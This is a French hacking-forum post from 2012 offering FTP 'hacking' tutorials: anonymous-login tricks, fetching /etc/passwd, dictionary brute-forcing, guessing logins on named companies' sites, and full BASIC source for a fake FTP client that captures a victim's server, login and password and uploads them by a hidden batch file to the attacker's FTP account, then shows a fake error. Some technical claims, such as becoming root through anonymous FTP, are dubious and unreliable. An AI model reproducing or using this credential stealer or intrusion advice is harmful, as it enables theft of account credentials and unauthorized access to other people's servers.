TehWoas Index du Forum
TehWoas
Site des challenges lobby
 
TehWoas Index du ForumFAQRechercherS’enregistrerConnexion

:: faille applicative ftp ::

 
Poster un nouveau sujet   Répondre au sujet    TehWoas Index du Forum -> Poster ici tout vos sites Hacker, Vos Virus et Vos tutos, stealer ect.... -> Failles Web
Sujet précédent :: Sujet suivant  
Auteur Message
TehWoas
Invité





MessagePosté le: Jeu 20 Sep - 18:05 (2012)    Sujet du message: faille applicative ftp Répondre en citant

1)faille applicative ftp
Ce hack est très simple mais il a un inconvénient : il marche de moins en moins...
Les serveurs sont de plus en plus protégés mais il y en a toujours pas mal, et j'essayerai de
vous filer quelques adresses de sites que l'ont peut hacker de cette manière.
Mais avant tout on va voir la technique : Ce hack s'effectue sous ftp.
Pour ouvrir ftp, cliquez sur Démarrer=>Executer=>ftp -n Une fenêtre ressemblant beaucoup
au DOS va s'ouvrir.
En bleu c'est ce qu'il faut taper, en orange ce que le serveur répond et en jaune mes commentaires 
ftp>open url_du_site (ex : ftp>openwww.aol.com) 
Connected to www.aol.com Web server Microsoft FTP Service (v.4.0) 
Ce qui est écrit ici dépend du système d'exploitation du serveur ; ce n'est pas important ici,
mais sa pourra vous servir dans d'autres techniques de hack. 
ftp>quote user ftp 
331 Anonymous access allowed, send identify (e-mail) as password 
ftp>quote cwd ~root 
530 Please loggin with USER and PASS 
ftp>quote pass ftp 230 
Anonymous user logged in 
Voilà vous êtes root ou tout au pire user sur la bécane, pour devenir root, vous devez trouver le
répertoire /etc et décrypter les passwords. Alors vous prenez VrackFTP Attention il faut être
patient et avoir du temps. 
- dans host vous mettes l'url du site par exemple pour www.ifrance.com/WhitePower
(site hacké par ravenshadow) 
- dans user nous mettez WhitePower 
- vous laissez le port 21 et dans passwords vous sélectionnez un dictionnaire (attention avec VrackFTp
il n'y a pas de dico donc vous en cherchez un. 
- Puis vous le laissez faire il trouve tout seul IMPORTANT!! : 
Une fois que vous êtes connecté ce sont les commandes FTP qui s'appliquent. 
Attention cette technique ne marche pas sur tout les serveurs donc ne vous étonnez pas
qu'il vous marque un message d'erreur 

2)Encore un autre technique de hack par ftp 
exemple sur www.francetelecom.com
(c'est un exemple :-) bon alors tu tapes : 
www.francetelecom.com/stats 
Si cela marche c'est que le serveur n'est pas bien protégé ou que l'accès est restreint autre
vérification tu tapes 
ftp://ftp.francetelecom.com 
Si tu as un accès c'est que c'est bon maintenant tu prends un client ftp du style WS_FTP . 
Le programme te demande un login et un UserID, alors si tu as réussi à entrer par ftp tu
cherches /etc/passwd . 
Autrement tu utilise WS_ping pro pack . 
Tu trace le site avec cet outil et la pour notre exemple tu vois apparaître LAMER il y a de
grandes chances que le UserId soit aussi le même que le login donc LAMER pour notre
exemple, viola tu es sur le site et tu fais ce que tu veux laisse tes traces mais n'efface pas de
fichier et n'oublies pas de laisser une petite trace pour les autres.
  
Encore autre chose Cette technique demande très peu de connaissances. 
Elle s'adresse plutôt aux Newbies.
Pour qu'elle marche, elle demande que l'utilisateur en face ne soit pas trop prudent.
Voici comment nous allons procéder : 
Nous voulons obtenir le Login et le Password d'un compte FTP. Pour cela, nous allons bricoler
un logiciel FTP bidon.
J'entends par logiciel FTP bidon : un logiciel ayant l'apparence d'un client FTP
(comme WS-FTP) mais qui n'en est pas un.
Il nous faudra également un compte FTP nous appartenant.
(Chez Mygale ça devrais faire l'affaire).
Donc, notre logiciel FTP bidon demandera, (comme tout logiciel client FTP)
à l'utilisateur le nom du serveur sur lequel est son compte, son Login et son Password. Ensuite,
il enregistrera ces infos dans un fichier. 
Une fois les infos enregistrées, le programme devra les envoyer directement dans notre compte.
Et voilà ! A présent, Il nous suffit d'aller relever dans notre compte les fichiers qui contiennent
les accès à l'aide cette fois d'un vrai client FTP.
L'exemple suivant est utilisé pour un compte FTP mais vous pouvez adapter cette technique pour
tout autre type de comptes en modifiant simplement l'aspect extérieur du programme.
Voici le code source du programme en Basic. 

CODE SOURCE EN BASIC : 

   

rem [Générateur Aléatoire] 
Randomize Timer 
rem [Infos sur le compte FTP] 
cls 
input "Veuillez rentrer l'adresse de votre serveur FTP "; A$ 
input "Veuillez rentrer votre Login "; N$ 
input "Veuillez rentrer votre Password "; P$ 
rem [Création d'un nom aléatoire de fichier pour le téléchargement sur votre compte] 
For X = 1 To 5 
F$ = F$ + Chr$(65 + Int(Rnd * 26)) 
Next rem [CrÚation d'un nom alÚatoire de fichier pour les commandes FTP] 
For X = 1 To 5 
G$ = G$ + Chr$(65 + Int(Rnd * 26)) 
Next 
rem [Création d'un nom aléatoire pour le fichier Batch (*.bat) qui executera les commandes] 
For X = 1 To 5 
B$ = B$ + Chr$(65 + Int(Rnd * 26)) 
Next 
rem [Enregistrement des infos du compte dans un fichier] 
Open "C:\" + F$ For Output As #1 
Print #1, A$ 
Print #1, N$ 
Print #1, P$ 
Close #1 
cls 
print "Connect to " + A$ 
rem [Enregistrement des commandes FTP] 
Open "C:\" + G$ For Output As #1 
Print #1, "open www.exemple.com" 
Print #1, "quote user code-bar" 
Print #1, "quote pass h5fila45" 
Print #1, "put C:\" + F$ + " x" + F$ 
Print #1, "close" 
Close #1 
rem [Enregistrement des commandes dans le fichier batch] 
Open "C:\windows\" + B$ + ".bat" For Output As #1 
Print #1, "@echo off" 
Print #1, "C:\windows\ftp -v -n -s:C:\" + G$ 
Print #1, "cls" 
Print #1, "del C:\" + F$ 
Print #1, "del C:\" + G$ 
Print #1, "cls" Close #1 
rem [Démarrage du fichier de commandes (Batch)] 
Shell "C:\windows\" + B$ + ".bat" 
Shell "del C:\windows\" + B$ + ".bat" 
rem [Fin de la procédure et erreur simulée] cls 
Print "Error (520) FTP Connexion failed" boucle: goto boucle
° ° ° ° ° ° ☠ h4(k3r f0r 1!f3
Cordialement le webmaster ☠ h4(k3r f0r 1!f3 ☠


Revenir en haut
Publicité






MessagePosté le: Jeu 20 Sep - 18:05 (2012)    Sujet du message: Publicité

PublicitéSupprimer les publicités ?
Revenir en haut
Montrer les messages depuis:   
Poster un nouveau sujet   Répondre au sujet    TehWoas Index du Forum -> Poster ici tout vos sites Hacker, Vos Virus et Vos tutos, stealer ect.... -> Failles Web Toutes les heures sont au format GMT + 1 Heure
Page 1 sur 1

 
Sauter vers:  

Index | creer un forum | Forum gratuit d’entraide | Annuaire des forums gratuits | Signaler une violation | Conditions générales d'utilisation
Thème créé par TehWoas'
Powered by phpBB © 2012 phpBB Group
Traduction par : phpBB-fr.com
  • TehWoas™ ©2012-2013